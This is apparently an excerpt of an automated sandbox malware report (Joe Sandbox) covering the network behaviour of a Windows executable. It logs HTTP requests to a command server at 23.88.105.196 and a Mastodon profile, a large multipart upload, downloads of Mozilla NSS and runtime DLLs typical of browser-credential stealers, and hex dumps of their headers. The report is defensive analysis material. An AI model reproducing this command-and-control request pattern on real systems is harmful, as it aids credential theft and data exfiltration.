Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\ Jump to behavior

Networking:

barindex
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /@killern0 HTTP/1.1Host: mas.to
Source: global traffic HTTP traffic detected: POST /1013 HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 23.88.105.196Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 109272Host: 23.88.105.196Connection: Keep-AliveCache-Control: no-cache
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 88.99.75.82 88.99.75.82
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 16:35:01 GMTContent-Type: application/x-msdos-programContent-Length: 334288Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "519d0-57aa1f0b0df80"Expires: Tue, 28 Sep 2021 16:35:01 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 f0 2f 05 84 91 41 56 84 91 41 56 84 91 41 56 8d e9 d2 56 88 91 41 56 5d f3 40 57 86 91 41 56 1a 31 86 56 85 91 41 56 5d f3 42 57 80 91 41 56 5d f3 44 57 8f 91 41 56 5d f3 45 57 8f 91 41 56 a6 f1 40 57 80 91 41 56 4f f2 40 57 87 91 41 56 84 91 40 56 d6 91 41 56 4f f2 42 57 86 91 41 56 4f f2 45 57 c0 91 41 56 4f f2 41 57 85 91 41 56 4f f2 be 56 85 91 41 56 4f f2 43 57 85 91 41 56 52 69 63 68 84 91 41 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d8 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 d8 03 00 00 66 01 00 00 00 00 00 29 dd 03 00 00 10 00 00 00 f0 03 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 05 00 00 04 00 00 a3 73 05 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 70 e6 04 00 50 00 00 00 c0 e6 04 00 c8 00 00 00 00 40 05 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fc 04 00 d0 1d 00 00 00 50 05 00 e0 16 00 00 30 e2 04 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 e2 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 38 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 d6 03 00 00 10 00 00 00 d8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 fc fe 00 00 00 f0 03 00 00 00 01 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 48 00 00 00 f0 04 00 00 04 00 00 00 dc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 40 05 00 00 04 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e0 16 00 00 00 50 05 00 00 18 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 16:35:01 GMTContent-Type: application/x-msdos-programContent-Length: 137168Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "217d0-57aa1f0b0df80"Expires: Tue, 28 Sep 2021 16:35:01 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d c2 55 b1 c9 a3 3b e2 c9 a3 3b e2 c9 a3 3b e2 c0 db a8 e2 d9 a3 3b e2 57 03 fc e2 cb a3 3b e2 10 c1 38 e3 c7 a3 3b e2 10 c1 3f e3 c2 a3 3b e2 10 c1 3a e3 cd a3 3b e2 10 c1 3e e3 db a3 3b e2 eb c3 3a e3 c0 a3 3b e2 c9 a3 3a e2 77 a3 3b e2 02 c0 3f e3 c8 a3 3b e2 02 c0 3e e3 dd a3 3b e2 02 c0 3b e3 c8 a3 3b e2 02 c0 c4 e2 c8 a3 3b e2 02 c0 39 e3 c8 a3 3b e2 52 69 63 68 c9 a3 3b e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 c4 5f eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 7a 01 00 00 86 00 00 00 00 00 00 e0 82 01 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 02 00 00 04 00 00 16 33 02 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 c0 01 00 74 1e 00 00 b4 de 01 00 2c 01 00 00 00 20 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 d0 1d 00 00 00 30 02 00 68 0c 00 00 00 b9 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 b9 01 00 18 00 00 00 68 b8 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 f4 02 00 00 6c be 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ca 78 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5e 65 00 00 00 90 01 00 00 66 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 0b 00 00 00 00 02 00 00 02 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 38 00 00 00 00 10 02 00 00 02 00 00 00 e6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 16:35:01 GMTContent-Type: application/x-msdos-programContent-Length: 440120Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "6b738-57aa1f0b0df80"Expires: Tue, 28 Sep 2021 16:35:01 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 16:35:01 GMTContent-Type: application/x-msdos-programContent-Length: 1246160Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "1303d0-57aa1f0b0df80"Expires: Tue, 28 Sep 2021 16:35:01 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 16:35:02 GMTContent-Type: application/x-msdos-programContent-Length: 144848Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "235d0-57aa1f0b0df80"Expires: Tue, 28 Sep 2021 16:35:02 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 16:35:02 GMTContent-Type: application/x-msdos-programContent-Length: 83784Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "14748-57aa1f0b0df80"Expires: Tue, 28 Sep 2021 16:35:02 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
